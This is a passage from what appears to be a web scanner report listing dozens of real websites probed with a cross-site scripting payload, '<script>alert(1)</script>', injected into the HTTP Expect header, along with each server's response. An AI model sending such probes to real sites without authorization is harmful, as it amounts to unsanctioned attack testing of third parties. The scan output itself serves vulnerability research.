User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leggs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:31:22 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.175. http://www.lionel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lionel.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lionel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.176. http://www.list-of-companies.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.list-of-companies.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.list-of-companies.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.177. http://www.livechatnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livechatnow.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livechatnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 04 May 2011 04:13:26 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.178. http://www.livedownloader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedownloader.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livedownloader.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:16:23 GMT
Server: Microsoft-IIS/6.0
Connection: close
Content-Type: text/html
Content-Length: 27

Page not found: favicon.ico

29.179. http://www.livewellhd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livewellhd.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livewellhd.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:42:29 GMT
Content-Length: 10039
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abclow01
X-Powered-By: ASP.NET


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


   <titl
...[SNIP]...

29.180. http://www.lockridgehomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lockridgehomes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lockridgehomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Length: 103
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:57:27 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.181. http://www.loews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.loews.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.loews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expection failed
Server: Lotus-Domino
Date: Wed, 04 May 2011 00:56:39 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 04 May 2011 00:56:39 GMT
Content-Type: text/html
Content-Length: 168

<HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 417</P><P>Reason: Expect header value is not set to 100-continue</P></BODY></HTML>

29.182. http://www.logih.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.logih.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.logih.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.183. http://www.longwood.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.longwood.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.longwood.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:48:32 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.184. http://www.lovablemoms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lovablemoms.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lovablemoms.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Wed, 04 May 2011 02:45:49 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

29.185. http://www.magiclegs.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magiclegs.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.magiclegs.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.186. http://www.mailanyone.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailanyone.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mailanyone.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:04:17 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 197

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL was not found on this server.<P>
<HR>
</BODY></HTML>

29.187. http://www.mallseeker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mallseeker.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mallseeker.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:16:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.188. http://www.marketingallianceassociation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketingallianceassociation.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marketingallianceassociation.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:45:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.189. http://www.mathfactcafe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathfactcafe.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mathfactcafe.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:11:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.190. http://www.mature4.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mature4.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mature4.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:02:13 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.191. http://www.maturetarget.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maturetarget.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maturetarget.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:53:19 GMT
Content-Type: text/html
Connection: close
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.192. http://www.maturewifetube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.maturewifetube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maturewifetube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:32:49 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

29.193. http://www.mcagfair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mcagfair.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mcagfair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Served-From: web1.270net.com
Date: Wed, 04 May 2011 01:52:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.194. http://www.mdlinx.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mdlinx.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mdlinx.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.195. http://www.mediaho.me/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaho.me
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaho.me
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:48:38 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.196. http://www.metrocast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metrocast.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.metrocast.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:59:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.197. http://www.miallstate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miallstate.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miallstate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 04 May 2011 01:04:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.198. http://www.midmichigan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.midmichigan.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.midmichigan.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:28:37 GMT
Content-Length: 60
Set-Cookie: TS1d8c95=03770d35edeee9b4c496026431d4b238da8b60e10ef16e944dc0c91e; Path=/

The page cannot be displayed because the expectation failed.

29.199. http://www.migif.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.migif.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.migif.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


29.200. http://www.million-movies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.million-movies.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.million-movies.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.35
Date: Wed, 04 May 2011 03:22:17 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.35</center>
</body>
</html>

29.201. http://www.miningjournal.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miningjournal.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miningjournal.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:36:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.202. http://www.minnesotajobnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.minnesotajobnetwork.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.minnesotajobnetwork.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:42:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.203. http://www.mnsun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mnsun.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mnsun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Wed, 04 May 2011 02:17:14 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: mnsun.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.204. http://www.momsandnylons.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momsandnylons.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momsandnylons.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:50:50 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.205. http://www.momsupdated.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momsupdated.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momsupdated.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.206. http://www.motherson.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.motherson.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motherson.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 02:56:43 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.207. http://www.movies-realm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.movies-realm.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.movies-realm.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Wed, 04 May 2011 02:26:58 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.39</center>
</body>
</html>

29.208. http://www.musi-c-lips.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musi-c-lips.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musi-c-lips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:18:37 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e9dadddb41b508b4d0955d0c38a36dd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 279

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...

29.209. http://www.mvcc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mvcc.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mvcc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:24:53 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.210. http://www.mybusinesslisting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 4520
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=NBGAHBODDGBJJINKLJFCJOMG; path=/
Cache-control: private

<html>
<head>
<title>favicon.ico Listings (yellow page directory / yellow pages directory) Businesses Category Browsing</title>

<link rel="stylesheet" href="/_css/styles.css" type="text/css" />

...[SNIP]...

29.211. http://www.myniceprofile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myniceprofile.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myniceprofile.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Wed, 04 May 2011 01:05:26 GMT
Server: WebServer

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.212. http://www.myonlypage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myonlypage.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myonlypage.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Wed, 04 May 2011 02:52:50 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

29.213. http://www.mypdfsearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mypdfsearch.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mypdfsearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:13:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.214. http://www.mysimplemobile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysimplemobile.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mysimplemobile.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:52:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.215. http://www.nailedstuds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nailedstuds.com
Path:   /favicon.ico

